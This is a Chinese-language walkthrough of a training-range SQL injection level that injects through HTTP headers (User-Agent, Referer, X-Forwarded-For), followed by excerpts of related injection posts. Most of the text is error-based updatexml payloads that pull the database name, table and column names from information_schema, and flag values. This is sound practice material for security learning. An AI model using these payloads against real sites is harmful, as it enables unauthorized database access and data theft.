封神台SQL注入 基礎靶場1 Head注入

2021-10-24 14:09:17 字數 1400 閱讀 9497

有沒有,用hackbar試一下即可

注入過程

更改user-agent

//爆庫

'or updatexml(1

,concat

(0x7e

,(select database()

)),1

),1)#

//爆表

'or updatexml(1

,concat

(0x7e

,(select group_concat

(table_name) from information_schema.tables where table_schema=

database()

)),1

),1)#

//爆欄位

'or updatexml(1

,concat

(0x7e

,(select group_concat

(column_name) from information_schema.columns where table_schema=

database

() and table_name=『flag_head』)),

1),1

)#//獲取字段值

'or updatexml(1

,concat

(0x7e

,(select flag_h1 from flag_head limit 0,1

)),1

),1)#

'or updatexml(1

,concat

(0x7e

,(select flag_h1 from flag_head limit 1,1

)),1

),1)#

'or updatexml(1

,concat

(0x7e

,(select flag_h1 from flag_head limit 2,1

)),1

),1)#

'or updatexml(1

,concat

(0x7e

,(select flag_h1 from flag_head limit 3,1

)),1

),1)#

'or updatexml(1

,concat

(0x7e

,(select flag_h1 from flag_head limit 4,1

)),1

),1)#

//因為updatexml函式報錯輸出的內容有限,所以不能使用group_concat一行輸出

更改referer

注入過程和語句同head(一)

加上xff

注入過程和語句同head(一)

mbp 封神台靶場 二(筆記)

開啟第二關的鏈結,是乙個雕塑網頁,點開各個鏈結檢視,在新聞動態裡點開了乙個新聞,發現了熟悉的身影。常理,還是用上一關的方法來測試一下,看看有沒有注入點,頁面顯示資料庫出錯,即可注入。union select 0,1,2,3,4,5,6,7,8,9 from admin發現傳參錯誤,這就有點麻煩了,說...

sql注入基礎

mysqli 轉義字串函式 mysqli real escape string db,string mysqli 預編譯 拼裝sql語句 把要進行的操作的sql語句提前寫好,把需要改變的元素變成佔位符 select id,username from user where user name and ...

SQL注入基礎

最為經典的單引號判斷法 在引數後面加上單引號,比如 abc.php?id 1 如果頁面返回錯誤,則存在 sql 注入。原因是無論字元型還是整型都會因為單引號個數不匹配而報錯。如果未報錯,不代表不存在 sql 注入,因為有可能頁面對單引號做了過濾,這時可以使用判斷語句進行注入。其實所有的型別都是根據資...